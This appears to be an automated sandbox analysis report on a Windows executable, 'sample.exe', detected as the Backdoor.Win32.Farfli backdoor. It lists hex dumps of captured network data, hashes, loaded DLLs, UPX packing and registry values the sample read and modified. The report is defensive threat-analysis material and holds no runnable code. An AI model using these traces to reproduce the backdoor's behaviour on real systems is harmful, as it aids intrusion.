0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 a000 000c 0200    ................
00f2 3114 3241 3245                        ..1.2A2E

Data received:

    
3249 324d 3251 3255 3259 325d 3261 3265    2I2M2Q2U2Y2]2a2e
3269 326d 3271 3275 3279 327d 3281 3285    2i2m2q2u2y2}2.2.
3289 328d 3291 3295 3299 329d 32a1 32a5    2.2.2.2.2.2.2.2.
32a9 32ad 32b1 32b5 32b9 32bd 32c1 32c5    2.2.2.2.2.2.2.2.
32c9 32cd 32d1 32d5 32d9 32dd 32e1 32e5    2.2.2.2.2.2.2.2.
32e9 32ed 32f1 32f5 32f9 32fd 3201 3305    2.2.2.2.2.2.2.3.
3309 330d 3311 3315 3319 331d 3321 3325    3.3.3.3.3.3.3!3%
3329 332d 3331 3335 3339 333d 3341 3345    3)3-3135393=3A3E
3349 334d 3351 3355 3359 335d 3361 3365    3I3M3Q3U3Y3]3a3e
3369 336d 3371 3375 3379 337d 3381 3385    3i3m3q3u3y3}3.3.
3389 338d 3391 3395 3399 339d 33a1 33a5    3.3.3.3.3.3.3.3.
33a9 33ad 33b1 33b5 33b9 33bd 33c1 33c5    3.3.3.3.3.3.3.3.
33c9 33cd 33d1 33d5 33d9 33dd 33e1 33e5    3.3.3.3.3.3.3.3.
33e9 33ed 33f1 33f5 33f9 33fd 3301 3405    3.3.3.3.3.3.3.4.
3409 340d 3411 3415 3419 341d 3421 3425    4.4.4.4.4.4.4!4%
3429 342d 3431 3435 3439 343d 3441 3445    4)4-4145494=4A4E
3449 344d 3451 3455 3459 345d 3461 3465    4I4M4Q4U4Y4]4a4e
3469 346d 3471 3475 3479 347d 3481 3485    4i4m4q4u4y4}4.4.
3489 348d 3491 3495 3499 349d 34a1 34a5    4.4.4.4.4.4.4.4.
34a9 34ad 34b1 34b5 34b9 34bd 34c1 34c5    4.4.4.4.4.4.4.4.
34c9 34cd 34d1 34d5 34d9 34dd 34e1 34e5    4.4.4.4.4.4.4.4.
34e9 34ed 34f1 34f5 34f9 34fd 3401 3505    4.4.4.4.4.4.4.5.
3509 350d 3511 3515 3519 351d 3521 3525    5.5.5.5.5.5.5!5%
3529 352d 3531 3535 3539 353d 3541 3545    5)5-5155595=5A5E
3549 354d 3551 3555 3559 355d 3561 3565    5I5M5Q5U5Y5]5a5e
3569 356d 3571 3575 3579 357d 3581 3585    5i5m5q5u5y5}5.5.
3589 358d 3591 3595 3599 359d 35a1 35a5    5.5.5.5.5.5.5.5.
35a9 35ad 35b1 35b5 35b9 35bd 35c1 35c5    5.5.5.5.5.5.5.5.
35c9 35cd 35d1 35d5 35d9 35dd 35e1 35e5    5.5.5.5.5.5.5.5.
35e9 35ed 35f1 35f5 35f9 35fd 3501 3605    5.5.5.5.5.5.5.6.
3609 360d 3611 3615 3619 361d 3621 3625    6.6.6.6.6.6.6!6%
3629 362d 3631 3635 3639 363d 3600 0000    6)6-6165696=6...
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000                        ........

Data received:

    
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000                        ........

Data received:

    
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000                        ........

Data received:

    
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0069 6d6d 7137 3232 706f 3460    .....immq722po4`
3131 6533 6f5e 3c3c 3b3b 335e 7332 3058    11e3o^<<;;3^s20X
4d3b 2f4c 4d3b 0101 0101 0101 0101 0101    M;/LM;..........
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0169    ...............i
6d6d 7137 3232 706f 3460 652f 3b33 6f5e    mmq722po4`e/;3o^
3c3c 3b3b 335e 7332 3058 4d3b 2f4c 4d3b    <<;;3^s20XM;/LM;
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0169 6d6d 7137 3232    .........immq722
706f 342e 3a60 6533 6f5e 3c3c 3b3b 335e    po4.:`e3o^<<;;3^
7332 3058 4d3b 2f4c 4d3b 0101 0101 0101    s20XM;/LM;......
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0169 6d6d 7137 3232 706f 3460 653c    ...immq722po4`e<
3933 6f5e 3c3c 3b3b 335e 7332 3058 4d3b    93o^<<;;3^s20XM;
2f4c 4d3b 0101 0101 0101 0101 0101 0101    /LM;............
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0169 6d6d    .............imm
7137 3232 706f 3431 3177 6a33 6f5e 3c3c    q722po411wj3o^<<
3b3b 335e 7332 6c73 6568 6e69 0101 0101    ;;3^s2lsehni....
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0169 6d6d 7137 3232 706f    .......immq722po
3431 3177 6a33 6f5e 3c3c 3b3b 335e 7332    411wj3o^<<;;3^s2
6060 683a 6266 666f 6b5d 6e01 0101 0101    ``h:bffok]n.....
0101 0101 0101 0101                        ........

Data received:

    
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 0101 0101 0101 0101    ................
0101 0101 0101 0101 01                     .........

2. sample.exe

	- General information about this executable

Analysis Reason:	Primary Analysis Subject
Filename:	sample.exe
MD5:	fc045d48179c5d945d3fad199cd6a273
SHA-1:	e5f6261228e9ba1b5ab3459449f2b9ee09e4a7fd
File Size:	28160 Bytes
Command Line:	"C:\sample.exe"
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\MSVCRT.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\SHELL32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000
C:\WINDOWS\system32\comctl32.dll	0x5D090000	0x0009A000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\iertutil.dll	0x42990000	0x00045000
C:\WINDOWS\system32\urlmon.dll	0x42CF0000	0x00127000
C:\WINDOWS\system32\ieframe.dll	0x42EF0000	0x005CD000
C:\WINDOWS\system32\UxTheme.dll	0x5AD70000	0x00038000
C:\WINDOWS\system32\netapi32.dll	0x5B860000	0x00055000
C:\WINDOWS\system32\MSCTF.dll	0x74720000	0x0004C000
C:\WINDOWS\system32\PSAPI.DLL	0x76BF0000	0x0000B000
C:\WINDOWS\system32\CLBCATQ.DLL	0x76FD0000	0x0007F000
C:\WINDOWS\system32\COMRes.dll	0x77050000	0x000C5000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\SETUPAPI.dll	0x77920000	0x000F3000
C:\WINDOWS\system32\appHelp.dll	0x77B40000	0x00022000
C:\WINDOWS\system32\VERSION.dll	0x77C00000	0x00008000

	- SigBuster Output

UPX All_Versions SN:1634

	- Ikarus Virus Scanner

Backdoor.Win32.Farfli (Sig-Id:469573)

2.a) sample.exe - Registry Activities

	- Registry Values Modified:

Key	Name	New Value
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d14d83ce-7d74-11dc-97e2-806d6172696f}\	BaseClass	Drive
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d14d83cf-7d74-11dc-97e2-806d6172696f}\	BaseClass	Drive
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cookies	C:\Documents and Settings\user\Cookies
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	AutoDetect	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	IntranetName	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ProxyBypass	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	UNCAsIntranet	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\	C:\WINDOWS\system32\taskkill.exe	Kill Process

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SOFTWARE\CLASSES\.ADE		Access.ADEFile.11	2
HKLM\SOFTWARE\CLASSES\.ADP		Access.Project.11	2
HKLM\SOFTWARE\CLASSES\.ASP		aspfile	2
HKLM\SOFTWARE\CLASSES\.BAT		batfile	2
HKLM\SOFTWARE\CLASSES\.CER		CERFile	2
HKLM\SOFTWARE\CLASSES\.CHM		chm.file	2
HKLM\SOFTWARE\CLASSES\.CMD		cmdfile	2
HKLM\SOFTWARE\CLASSES\.COM		comfile	2
HKLM\SOFTWARE\CLASSES\.CPL		cplfile	2
HKLM\SOFTWARE\CLASSES\.CRT		CERFile	2
HKLM\SOFTWARE\CLASSES\.EXE		exefile	5
HKLM\SOFTWARE\CLASSES\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\INPROCSERVER32		%SystemRoot%\system32\SHELL32.dll	2
HKLM\SOFTWARE\CLASSES\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\INPROCSERVER32		C:\WINDOWS\system32\urlmon.dll	2
HKLM\SOFTWARE\CLASSES\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\INPROCSERVER32		C:\WINDOWS\system32\ieframe.dll	4
HKLM\SOFTWARE\CLASSES\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\INPROCSERVER32	ThreadingModel	Apartment	2
HKLM\SOFTWARE\CLASSES\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\SHELLFOLDER	WantsParseDisplayName		2
HKLM\SOFTWARE\CLASSES\CLSID\{AEB6717E-7E19-11D0-97EE-00C04FD91972}\INPROCSERVER32		shell32.dll	2
HKLM\SOFTWARE\CLASSES\DIRECTORY	AlwaysShowExt		1
HKLM\SOFTWARE\CLASSES\DRIVE\SHELLEX\FOLDEREXTENSIONS\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}	DriveMask	32	2
HKLM\SOFTWARE\CLASSES\EXEFILE\SHELL\OPEN\COMMAND		"%1" %*	4
HKLM\SOFTWARE\CLASSES\INTERFACE\{000214E6-0000-0000-C000-000000000046}\PROXYSTUBCLSID32		{bf50b68e-29b8-4386-ae9c-9734d5117cd5}	2
HKLM\SOFTWARE\CLASSES\INTERFACE\{79EAC9C4-BAF9-11CE-8C82-00AA004BA90B}\PROXYSTUBCLSID32		{B8DA6310-E19B-11D0-933C-00A0C90DCAA9}	2
HKLM\SOFTWARE\CLASSES\INTERFACE\{93F2F68C-1D1B-11D3-A30E-00C04F79ABD1}\PROXYSTUBCLSID32		{bf50b68e-29b8-4386-ae9c-9734d5117cd5}	2
HKLM\SOFTWARE\CLASSES\INTERFACE\{B722BCCB-4E68-101B-A2BC-00AA00404770}\PROXYSTUBCLSID32		{B8DA6310-E19B-11D0-933C-00A0C90DCAA9}	2
HKLM\SOFTWARE\CLASSES\INTERFACE\{EAB22AC1-30C1-11CF-A7EB-0000C05BAE0B}\TYPELIB		{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}	2
HKLM\SOFTWARE\Microsoft\CTF\SystemShared\	CUAS	0	1
HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup	IExploreLastModifiedHigh	29887276	2
HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup	IExploreLastModifiedLow	2933474304	2
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE		C:\Program Files\Internet Explorer\IEXPLORE.EXE	2
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	EnablePunycode	1	1
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager	CriticalSectionTimeout	2592000	1
HKLM\SYSTEM\Setup	OsLoaderPath	\	2
HKLM\SYSTEM\Setup	SystemPartition	\Device\HarddiskVolume1	2
HKLM\SYSTEM\WPA\MediaCenter	Installed	0	4
HKLM\Software\Classes\CLSID\{871c5380-42a0-1069-a2ea-08002b30309d}\InProcServer32		C:\WINDOWS\system32\ieframe.dll	2
HKLM\Software\Microsoft\COM3	Com+Enabled	1	4
HKLM\Software\Microsoft\COM3	REGDBVersion	0x0f00000000000000	6
HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BEHAVIORS	*	1	1
HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL	*	1	1
HKLM\Software\Microsoft\Windows\CurrentVersion	DevicePath	%SystemRoot%\inf	1
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation	CutList	0x4100700070006c00690063006100740069006f006e002000460069006c00	2
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks	{AEB6717E-7E19-11d0-97EE-00C04FD91972}		2
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\\msn.com			1
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\\msn.com\related	http	4	1
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup	DriverCachePath	%SystemRoot%\Driver Cache	2
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup	LogLevel	0	2
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup	ServicePackCachePath	c:\windows\ServicePackFiles\ServicePackCache	2
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup	ServicePackSourcePath	c:\windows\ServicePackFiles	2
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup	SourcePath	D:\	2
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	AuthenticodeEnabled	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	TransparentEnabled	1	3
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName	ComputerName	USER	2
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Domain		1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Hostname	user	1
HKLM\System\Setup	SystemSetupInProgress	0	2
HKLM\System\WPA\PnP	seed	1374283966	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\	ShellState	0x2400000033880000000000000000000000000000010000000d0000000000	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	DontPrettyPath	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	Filter	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	Hidden	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	HideFileExt	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	HideIcons	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	MapNetDrvBtn	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	NoNetCrawling	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	SeparateProcess	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	ShowCompColor	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	ShowInfoTip	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	ShowSuperHidden	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	WebView	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{d14d83ce-7d74-11dc-97e2-806d6172696f}\	Data	0x000000005c005c003f005c0049004400450023004300640052006f006d00	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{d14d83ce-7d74-11dc-97e2-806d6172696f}\	Generation	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{d14d83cf-7d74-11dc-97e2-806d6172696f}\	Data	0x000000005c005c003f005c00530054004f00520041004700450023005600	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{d14d83cf-7d74-11dc-97e2-806d6172696f}\	Generation	1	3
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Cache	%USERPROFILE%\Local Settings\Temporary Internet Files	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Cookies	%USERPROFILE%\Cookies	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\			1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	@ivt	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	file	3	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	ftp	3	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	http	3	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	https	3	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	shell	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	1806	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	Flags	33	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	Flags	475	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	Flags	71	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	Flags	1	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	Flags	3	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0x401	0x01000000310032003a893fef1312c801	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	LangID	0x0904	1
